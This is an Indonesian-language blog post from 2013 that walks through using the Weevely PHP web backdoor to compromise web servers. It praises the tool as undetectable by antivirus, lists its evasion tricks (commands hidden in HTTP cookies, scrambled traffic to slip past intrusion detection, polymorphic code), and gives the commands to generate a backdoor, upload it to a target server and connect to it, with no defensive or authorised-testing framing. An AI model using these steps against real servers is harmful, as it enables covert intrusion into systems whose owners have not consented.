Selasa, 06 Agustus 2013

Simple BackConnect Using Weevly For Ubuntu


Weevely merupakan PHP atau web backdoor yang saat ini masih ampuh dan belum bisa di deteksi oleh antii virus.Interface dari weevely seperti konsol telnet dengan kata lain CLI,ini adalah alat perang yang sanagtpenting untuk eksploitasi web,baik web premium maupun web dengan hosting gratis


Saat ini weevely sudah terdapat dalam distro backtrack linux dan kali linux, alasan backdoor ini sulit dideteksi oleh orang awam dalam bidang security :
- Backdoor menerima perintah tersembunyi dengan HTTP Cookie.
- Komunikasi (client รข€“ backdoor) di acak untuk meloloskan NIDS signature detection.
- Backdoor jenis polymorphic PHP Code untuk meloloskan AV detection. 
Penggunaan :
- Memasuki direktori 
root@bt:~# cd /pentest/backdoors/web/weevely
- Generate backdoor 
root@bt:~# ./weevely password path
Selanjutnya file backdoor itu di upload ke suatu server. Dengan demikian backdoor sudah tertanam di server. 

- Mengakses backdoor 
root@bt:~# ./weevely url+path password

Sumber : Coupe De GraceISD Forum
Diposting oleh di
Label:

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)
 
root@bt: ~# isd © 2011 Templates | uzanc